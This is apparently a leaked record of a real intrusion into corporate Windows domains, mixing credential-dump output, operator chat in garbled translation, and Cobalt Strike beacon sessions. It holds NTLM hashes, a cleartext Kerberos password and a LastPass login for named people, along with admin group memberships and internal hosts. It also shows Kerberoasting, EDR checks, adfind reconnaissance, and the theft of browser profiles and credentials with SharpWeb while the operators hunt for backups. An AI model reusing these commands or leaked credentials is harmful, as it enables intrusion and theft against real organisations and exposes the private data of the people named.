Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/12/2020 11:34:38 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : ADC03-PHX01$ Domain : GLOBALNET Logon Server : (null) Logon Time : 8/12/2020 11:30:58 PM SID : S-1-5-20 msv : [00000003] Primary * Username : ADC03-PHX01$ * Domain : GLOBALNET * NTLM : 12c4f1c0a7300d1f015d64e308229900 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1 tspkg : wdigest : * Username : ADC03-PHX01$ * Domain : GLOBALNET * Password : (null) kerberos : * Username : adc03-phx01$ * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 73224 (00000000:00011e08) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 8/12/2020 11:30:50 PM SID : msv : [00000003] Primary * Username : ADC03-PHX01$ * Domain : GLOBALNET * NTLM : 12c4f1c0a7300d1f015d64e308229900 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1 tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 3842484810 (00000001:e507aa4a) Session : Interactive from 0 User Name : g.boles Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 12/2/2020 12:01:27 AM SID : S-1-5-21-498103351-3997332795-3100871051-15102 msv : [00000003] Primary * Username : g.boles * Domain : GLOBALNET * NTLM : 2a7f47acb7457f80dbb0818577a7a79b * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3 [00010000] CredentialKeys * NTLM : 2a7f47acb7457f80dbb0818577a7a79b * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3 tspkg : wdigest : * Username : g.boles * Domain : GLOBALNET * Password : (null) kerberos : * Username : g.boles * Domain : globalnet.local * Password : Splat_9550! 
ssp : credman : Authentication Id : 1 ; 2401291807 (00000001:8f20ce1f) Session : RemoteInteractive from 27 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 11/17/2020 10:27:35 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 1683096786 (00000001:645204d2) Session : RemoteInteractive from 24 User Name : jehad.jamalalldeen Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 11/10/2020 3:12:11 PM SID : S-1-5-21-498103351-3997332795-3100871051-26749 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 1184016058 (00000001:4692a6ba) Session : RemoteInteractive from 22 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 11/5/2020 7:30:15 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 1 ; 462032262 (00000001:1b8a0d86) Session : RemoteInteractive from 19 User Name : ctrails Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/28/2020 1:54:05 PM SID : S-1-5-21-498103351-3997332795-3100871051-5297 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 4281980116 (00000000:ff39d4d4) Session : RemoteInteractive from 18 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/23/2020 10:17:14 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 4045964244 (00000000:f12883d4) Session : RemoteInteractive from 17 User Name : ctrails2 Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/20/2020 5:00:44 PM SID : S-1-5-21-498103351-3997332795-3100871051-12967 msv : [00000003] Primary * Username : ctrails2 * Domain : GLOBALNET * NTLM : 5dccf338588af5e878393924440dd31b47 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290 [00010000] CredentialKeys * NTLM : 5dccf338588af5e878393924440dd31b47 * SHA1 : 
9d5cb5951028c851f4449ab582699851223ea290 tspkg : wdigest : * Username : ctrails2 * Domain : GLOBALNET * Password : (null) kerberos : * Username : ctrails2 * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 4045959606 (00000000:f12871b6) Session : Interactive from 17 User Name : DWM-17 Domain : Window Manager Logon Server : (null) Logon Time : 10/20/2020 5:00:44 PM SID : S-1-5-90-17 msv : [00000003] Primary * Username : ADC03-PHX01$ * Domain : GLOBALNET * NTLM : 12c4f1c0a7300d1f015d64e308229900 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1 tspkg : wdigest : * Username : ADC03-PHX01$ * Domain : GLOBALNET * Password : (null) kerberos : * Username : ADC03-PHX01$ * Domain : globalnet.local * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5 ssp : credman : Authentication Id : 0 ; 3751704448 (00000000:df9e7780) Session : RemoteInteractive from 16 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/15/2020 1:35:54 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 3729906510 (00000000:de51db4e) Session : RemoteInteractive from 15 User Name : jehad.jamalalldeen Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/14/2020 4:06:50 PM SID : 
S-1-5-21-498103351-3997332795-3100871051-26749 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 3288541437 (00000000:c40328fd) Session : RemoteInteractive from 12 User Name : joel.reed Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/6/2020 10:44:37 AM SID : S-1-5-21-498103351-3997332795-3100871051-15177 msv : [00000003] Primary * Username : joel.reed * Domain : GLOBALNET * NTLM : 7d9d843800ed5d922b69507f2dd2cfda * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e [00010000] CredentialKeys * NTLM : 7d9d843800ed5d922b69507f2dd2cfda * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e tspkg : wdigest : * Username : joel.reed * Domain : GLOBALNET * Password : (null) kerberos : * Username : joel.reed * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 3288541401 (00000000:c40328d9) Session : RemoteInteractive from 12 User Name : joel.reed Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 10/6/2020 10:44:37 AM SID : S-1-5-21-498103351-3997332795-3100871051-15177 msv : [00000003] Primary * Username : joel.reed * Domain : GLOBALNET * NTLM : 7d9d843800ed5d922b69507f2dd2cfda * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e [00010000] CredentialKeys * NTLM : 7d9d843800ed5d922b69507f2dd2cfda * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e tspkg : wdigest : * Username : joel.reed * Domain : GLOBALNET * Password : (null) kerberos : * Username : joel.reed * Domain : GLOBALNET.LOCAL * Password : (null) ssp : credman : Authentication Id : 0 ; 2087392369 (00000000:7c6b1471) Session : RemoteInteractive from 11 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 9/16/2020 4:44:41 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 1983891583 (00000000:763fc87f) Session : RemoteInteractive from 10 User Name : g.boles Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 9/14/2020 1:20:20 PM SID : 
S-1-5-21-498103351-3997332795-3100871051-15102 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 1638269471 (00000000:61a6021f) Session : RemoteInteractive from 9 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 9/8/2020 11:31:51 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 504788415 (00000000:1e1675bf) Session : RemoteInteractive from 7 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/20/2020 11:56:26 PM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 472372604 (00000000:1c27d57c) Session : RemoteInteractive from 6 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/20/2020 11:32:37 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 472372568 (00000000:1c27d558) Session : RemoteInteractive from 6 User Name : sjose Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/20/2020 11:32:37 AM SID : S-1-5-21-498103351-3997332795-3100871051-11974 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 116428364 (00000000:06f08e4c) Session : RemoteInteractive from 4 User Name : ctrails Domain : GLOBALNET Logon Server : ADC03-PHX01 Logon Time : 8/14/2020 12:56:27 PM SID : S-1-5-21-498103351-3997332795-3100871051-5297 msv : tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 8/12/2020 11:31:00 PM SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) * kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : ``Then it's time to sleep ``))`Did you manage to enter the main working domain 
with the EnterPrime? but I would have to look for the admin by the eta... yeah... as you can see the ing goes `` beacon> edr_query localhost x64 [+] Determining what EDR products are installed on localhost... [+] host called home, sent: 57 bytes [+] ehdrv.sys Found [+] 1 EDR Products Found! ====================== | Vendor Information | ---------------------- [+] ESET Found! `````` beacon> powershell-import /home/trash/tools/Invoke-Kerberoast.ps1 [*] Tasked beacon to import: /home/trash/tools/Invoke-Kerberoast.ps1 [+] host called home, sent: 12760 bytes beacon> psinject 10292 x64 Invoke-Kerberoast -OutputFormat HashCat | fl [*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl into 10292 (x64) [+] host called home, sent: 133723 bytes beacon> whoami [-] Unknown command: whoami beacon> shell whoami [*] Tasked beacon to run: whoami [+] host called home, sent: 37 bytes [+] received output: globalnet\sraadmin strange guys strangely they separated the prod but left the mutual trust this trust domain clerks will and hashes Dana DK you tamu 2008 server why? no access first dsink I'll take it down...I want to see if my pid will give try to call something from your process fuck what psinject for example some weak script or something it doesn't matter, you're not alone, do you still have a session in the extended domain? ahem listen there's a lot of things to check = (noisy and they'll stay as artifacts for analysis = (no a lot of randl processes will stay there and then we'll have to shellcode them when we'll have to work a lot and so with migra problems we'll have to think how to locate...two domains we can do a simple what? you jump with an interpreter and fix it? 
3.5MB fil 12/02/2020 18:11:39 ad_computers.txt 2.1MB fil 12/02/2020 18:11:47 ad_group.txt 159.8KB fil 12/02/2020 18:11:39 ad_ous.txt 159B fil 12/02/2020 18:11:44 ad_subnets.txt 445B fil 12/02/2020 18:11:53 ad_trustdmp.txt 12.8MB fil 12/02/2020 18:11:35 ad_users.txt foundsraadmin can't this account jump into the main domain directly? okmmmmmtk if you use a system batnick then it will come off then try another host or something i can't get it off the polzak (memory protected) i can't get it on the systemdas polzak processes? what context are you trying to use? ldap_get_next_page_s: [ADC02-PHX01.globalnet.local] Error 0x1 (1) - Operations Error Uh-huh, wrong one. adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=person)" > ad_users.txt adfind.exe -b DC=globalnet,DC=local -f "objectcategory=computer" > ad_computers.txt adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=organizationalUnit)" > ad_ous.txt adfind.exe -b DC=globalnet,DC=local -subnets -f (objectCategory=subnet)> ad_subnets.txt adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=group)" > ad_group.txt adfind.exe -b DC=globalnet,DC=local -gcb -sc trustdmp > ad_trustdmp.txt ``What am I doing wrong? Here is their entire cloud system in this domain`` For the full year, GlobalTranz reported $1.4 billion in revenue, representing 62 percent year-over-year growth, a net revenue increase of 63 percent, and EBITDA growth of 150 percent. `````` About GlobalTranz GlobalTranz is a technology company providing award-winning cloud-based multi-modal Transportation Management System (TMS) products to shippers, carriers, 3PLs and brokers. GlobalTranz is leading the logistics software and services market in innovative technology that optimizes the efficiency of freight movement and matches shipper demand and carrier capacity in real-time. 
Leveraging its extensive independent agent network, GlobalTranz has emerged as a fast-growing market leader with a customer base of over 1 million product users and 25,000 shippers. In 2018, Transport Topics named GlobalTranz a Top 10 largest freight brokerage firm in the U.S. Take off the second domain, it's their prodadomain, it's the server domain Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- acerimeli Administrator amadeus aporwal bkadmin Caleb.Maher ctrails ctrails2 emontgomery eric gnet_admin godonnell GTZ.Kace gtz__ssrsadmin james.clark jared.lauzon jason.heller jeff.tarnowski jgettman jhess jhoegl jklida joel.reed john.mohlman leland.andersen macie.oyler mjscott prtgpoller sblumenthal sdavids sjose skyler.tisue sraadmin svcadmin `````` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- A.Maser aarora AC.Prod Administrator ahaines alan.blythe amitv aporwal appscheduler backendscheduler bdadyala bgarrick bkadmin bkeene Caleb.Maher Carl.Fields CC.Prod christopher.collazo cr2.prod ctrails ctrails2 darwin.porter datamigration dave.devore david.duvall DB_SRVC dbtest eric.scheerer feliciano.torres g.boles gnet_admin godonnell GTZ.Kace gtz__ssrsadmin j.pillon james.clark james.obryant jared.lauzon jason.heller jeff.tarnowski jehad.Jamalalldeen jhess jklida jobryant joel.reed john.mohlman keith.hodges kevin.foster leland.andersen lyle.larsen m.maurer m.wozniak macie.oyler maintenance Martin.Owings Matthew.Schmidt mbellman mgserrano mlinder mwall p.brahmbhatt P.Malling prodagent prtgpoller R.Felker R.Pettit RC.Prod rkladmin robert.koogle rpeeta russ.felker ryan.pettit ryan.terry S.Mohammed sjose skyler.tisue SQLP_RelicAdmin sraadmin subin svcadmin tabadmin Umair.Anis vpntest12 y.khasho `````` Alias name administrators Comment 
Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- a.bousquet a.ocr Administrator ahaines ahaines1 amadeus bgarrick bkadmin bkeene bsezairi caleb.maher cara.crawford chris.provan christopher.collazo ctrails ctrails2 Daniel.collazo darwin.porter dave.devore DBuchert derek.schmidt docimg Domain Admins donelson EDI EDI204Service EDI204Service1 Enterprise Admins eric.scheerer feliciano.torres g.boles g.serrano gnbdad gnet_admin godonnell GTZ.Kace gtz__ssrsadmin j.pillon jalbenberg james.clark james.obryant jared.lauzon jason.heller jbooth jeff.tarnowski Jehad.Jamalalldeen jgettman jgettman1 jhess jhohman joel.reed john.mohlman joseph.urbine keith.hodges leland.andersen lyle.larsen m.maurer m.wozniak macie.oyler malannefeld mason.sanchez mbiesiada mbiesiada1 mdbenjamin mgserrano mjgaines mjscott mleyshon mlinder mmbiesiada mwall nbowser p.brahmbhatt p.vuong prtgpoller rkladmin rkrugg robert.koogle rstubbs128 russ.felker ryan.pettit ryan.terry sblumenthal sdavids shanna.thomas skyler.tisue Snigdha sraadmin svcadmin tabadmin tmgauthier ttessmer y.khasho `````` ADC02-PHX01.globalnet.local [DS] Site: PHX01 ADC03-PHX01.globalnet.local [PDC] [DS] Site: PHX01 GTZAZRGNADC01.globalnet.local [DS] Site: Azure-WestUS GTZZRGNADC02.globalnet.local [DS] Site: Azure-WestUS ``yeaheah Now we'll see))) well, let's gookaye bye bye all goodnight read all right, tomorrow by 3 then i searched among the domains) lol) aaaaaaand the logo as the children's world on the rightzoho where did you see it? i do not see her noticing a match and here it is on the screen this grid was at work so, so? do not understanda here is such a coincidencea we were just poking ita what's wrong with it? 
#zohocorpin-com zohofiles delete)yes, sessions in the slip until tomorrow then and for today all will have time to get on rdto tomorrow to 301:12 PM`https://lastpass.com mharper@waterway.com LoveUnit14` and give shell timea logicalokayot system try it from his context? hehe`d you take away? 7-Zip (a) 18.05 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30 Scanning the drive: 2156 folders, 6028 files, 362713974 bytes (346 MiB) Creating archive: ff.7z Add new data to archive: 2156 folders, 6028 files, 362713974 bytes (346 MiB) WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\cert9.db WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\content-prefs.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\cookies.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\cookies.sqlite-shm WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\favicons.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\favicons.sqlite-shm WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\favicons.sqlite-wal WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\formhistory.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\key4.db WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\permissions.sqlite WARNING: The process cannot access the file because it is being used by another process. 
krbjz40r.default-1588080079106\places.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\places.sqlite-shm WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\places.sqlite-wal WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\protections.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\storage-sync-v2.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\storage-sync-v2.sqlite-shm WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\storage-sync-v2.sqlite-wal WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\storage.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\weave\bookmarks.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\webappsstore.sqlite WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\webappsstore.sqlite-shm WARNING: The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\webappsstore.sqlite-wal [+] received output: Files read from disk: 6012 Archive size: 168244956 bytes (161 MiB) WARNINGS for files: krbjz40r.default-1588080079106\cert9.db : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\content-prefs.sqlite : The process cannot access the file because it is being used by another process. 
krbjz40r.default-1588080079106\cookies.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\cookies.sqlite-shm : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\favicons.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\favicons.sqlite-shm : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\favicons.sqlite-wal : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\formhistory.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\key4.db : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\permissions.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\places.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\places.sqlite-shm : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\places.sqlite-wal : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\protections.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\storage-sync-v2.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\storage-sync-v2.sqlite-shm : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\storage-sync-v2.sqlite-wal : The process cannot access the file because it is being used by another process. 
krbjz40r.default-1588080079106\storage.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\weave\bookmarks.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\webappsstore.sqlite : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\webappsstore.sqlite-shm : The process cannot access the file because it is being used by another process. krbjz40r.default-1588080079106\webappsstore.sqlite-wal : The process cannot access the file because it is being used by another process. ---------------- WARNING: Cannot open 22 files The blue one is the same as the one you put in the coboo where the session from it hangs in theC:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\get me and so on, we renamed it as native if anything, did you delete your files and put it in the original folder with your profile?i don't know how to check if it's ok, but i've already tried it, ff won't pick up the profile he put in the folder. 
if everything is ok, tomorrow let's close it quietly and check access to this URLGet the folder with his ff profile in the archive and dedicate it if not, by 4tomorrow by 6 and if everything is ok, i thought these guys switched to paper and hand the access by Planes) 30203 http://192.168.0.75/ 30824 https://192.168.0.75/ 30825 https://192.168.0.75/#/login 30826 https://192.168.0.75/#/dashboard 30827 https://192.168.0.75/#/manage/storage/group/volumes/summary 30828 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/summary 30829 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/data_access/connections 30830 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/data_access/access 30831 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000007/summary 30832 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000007/data_protection 30833 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/summary 30834 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_protection 30835 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_access/connections 30836 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_access/access 30837 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/edit?startTabIndex=3 30890 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000034/summary ``Bingo eat))``ww-nimble-01 ``https://192.168.0.75/#/login`` basic nimbles: https://192.168.0.42 https://192.168.0.43 https://192.168.0.75 https://192.168.0.77 What's the host and what's nimbla's host? and he has a fat history there + he's gone out of his messages?) 
I'm waiting for the last files and we won't leave until tomorrow. What about ff? so we haven't found nimbla access and close this network tomorrow by 6 let's finish with backups today. everywhere you touch backups, the whole network is full of backups. if not, we miss it. it's not certain that there is any, but you should look for ithtp://www://www.solarwinds.com/company/press-releases/2018-q1/solarwinds-introduces-cloud-first-backup-ѕervisetcurrent?[ ](https://mediaeveryone.com/group/waterway-com?msg=nXNNWJGfqQRE3tnBE) yeah no, it's monitoringc by the way there may be backups too it is solarwindsno @user7 seemed to find accesses? change without .back and see what is it delete it tamag, take back version `` beacon> shell copy places.sqlite places.sqlite.back [*] Tasked beacon to run: copy places.sqlite places.sqlite.back [+] host called home, sent: 68 bytes [+] received output: 1 file(s) copied. ``in the keylog?``https://192.168.0.254 mharper@waterway.com LoveUnit14* ``:thinking:``places.sqlite places.sqlite.back``? 
shell copy places.sqlite ``Try and try to make it with places, I'm losing my mind.`` Size Type Last Modified Name ---- ---- ------------- ---- dir 01/05/2021 09:46:52 bookmarkbackups dir 11/16/2020 21:37:15 browser-extension-data dir 01/04/2021 14:56:52 crashes dir 01/05/2021 12:48:45:45 datareporting dir 12/17/2020 09:33:11 extensions dir 09/04/2020 13:15:30 gmp dir 04/28/2020 08:26:45 gmp-gmpopenh264 dir 04/28/2020 08:26:46 gmp-widevinecdm dir 10/19/2020 16:22:05 minidumps dir 01/05/2021 03:08:07 saved-telemetry-pings dir 04/28/2020 08:26:46 security_state dir 01/05/2021 12:48:46 sessionstore-backups dir 12/31/2020 10:12:55 shader-cache dir 04/28/2020 08:21:23 storage dir 01/05/2021 12:43:45 weave 28kb fil 01/05/2021 08:53:22 addons.json 3kb fil 01/04/2021 14:58:43 addonStartup.json.lz4 0b fil 01/04/2021 14:20:20 AlternateServices.txt 3kb fil 01/05/2021 12:43:47 autofill-profiles.json 216b fil 01/05/2021 12:06:12 broadcast-listeners.json 352kb fil 12/21/2020 09:14:06 cert9.db 11kb fil 12/21/2020 09:14:06 cert_override.txt 0b fil 01/04/2021 14:20:20 ClientAuthRememberList.txt 199b fil 12/23/2020 10:29:42 compatibility.ini 1024b fil 08/17/2020 10:57:55 containers.json 224kb fil 12/31/2020 11:18:27 content-prefs.sqlite 1024kb fil 01/05/2021 12:48:43 cookies.sqlite 32kb fil 01/04/2021 14:55:55 cookies.sqlite-shm 0b fil 01/04/2021 14:55:55 cookies.sqlite-wal 132b fil 08/03/2020 14:38:42 enumerate_devices.txt 1kb fil 11/16/2020 21:37:17 extension-preferences.json 470b fil 01/04/2021 14:55:57 extension-settings.json 90kb fil 01/05/2021 08:55:23 extensions.json 10mb fil 01/04/2021 14:17:59 favicons.sqlite 32kb fil 01/04/2021 14:55:55 favicons.sqlite-shm 320kb fil 01/04/2021 15:13:24 favicons.sqlite-wal 864kb fil 01/05/2021 11:52:07 formhistory.sqlite 1kb fil 12/31/2020 10:59:25 handlers.json 16kb fil 08/15/2019 11:32:20 key3.db 288kb fil 08/15/2019 11:32:20 key4.db 3kb fil 01/05/2021 03:08:07 logins-backup.json 3kb fil 01/05/2021 09:08:12 logins.json 18kb fil 12/31/2020 
12:15:22 notificationstore.json 0b fil 01/04/2021 14:55:55 parent.lock 96kb fil 01/04/2021 15:30:37 permissions.sqlite 507b fil 04/28/2020 08:21:23 pkcs11.txt 25mb fil 01/05/2021 11:52:08 places.sqlite 32kb fil 01/04/2021 14:55:55 places.sqlite-shm 3mb fil 01/05/2021 11:52:08 places.sqlite-wal 1kb fil 12/24/2020 09:30:13 pluginreg.dat 29kb fil 01/05/2021 12:43:45 prefs.js 64kb fil 01/04/2021 14:57:35 protections.sqlite 532b fil 01/04/2021 14:55:57 search.json.mozlz4 0b fil 01/04/2021 14:20:20 SecurityPreloadState.txt 11kb fil 01/04/2021 14:56:02 serviceworker.txt 90b fil 01/04/2021 14:55:56 sessionCheckpoints.json 2kb fil 01/05/2021 12:05:42 3kb fil 01/05/2021 09:08:10 signedInUser.json 53kb fil 01/05/2021 12:48:58 SiteSecurityServiceState.txt 32kb fil 08/01/2020 09:29:18 storage-sync-v2.sqlite 32kb fil 01/04/2021 14:57:39 storage-sync-v2.sqlite-shm 1mb fil 12/16/2020 12:00:52 storage-sync-v2.sqlite-wal 128kb fil 07/29/2020 19:52:03 storage-sync.sqlite 22kb fil 01/04/2021 14:55:56 storage.sqlite 47b fil 04/28/2020 08:21:19 times.json 13mb fil 01/04/2021 15:09:04 webappsstore.sqlite 32kb fil 01/04/2021 14:55:55 webappsstore.sqlite-shm 704kb fil 01/04/2021 15:47:03 webappsstore.sqlite-wal 1kb fil 01/05/2021 12:20:58 xulstore.json ``Give me the profile listing I can't find it and take the second one and make a copy History History.back``` ====== FirefoxHistory ====== ERROR: IO exception, places.sqlite file likely in use (i.e. Firefox is likely running). The process cannot access the file 'C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite' because it is being used by another process. History (mharper): ``I'll compare if it's ok, we'll just take the history just in case and give me both files``. places.sqlite This file contains all your Firefox bookmarks and lists of all the files you've downloaded and websites you've visited. ``History''. 
beacon> download C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite [*] Tasked beacon to download C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite [+] host called home, sent: 110 bytes [*] started download of C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite (26214400 bytes) [+] received output: [-] Invoke_3 on EntryPoint failed. I wonder where he went through his History file, I guess it's time to look for an alternative, I told you, he's the usual ``` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all [*] Tasked beacon to run .NET program: SharpWeb.exe all [+] host called home, sent: 705073 bytes [+] received output: === Chrome (Current User) === [X] Exception: Key not valid for use in specified state. === Checking for Firefox (Current User) === === Checking Windows Vaults === [-] Invoke_3 on EntryPoint failed. If it works, give me the output I told you about it so sharpweb?) than shoot it, check if the backups are up to date, give ffu only chrome, it must have worked in the fall have you? I have not worked at all)sharpweb as usual and you and chrome ffu have pulled?
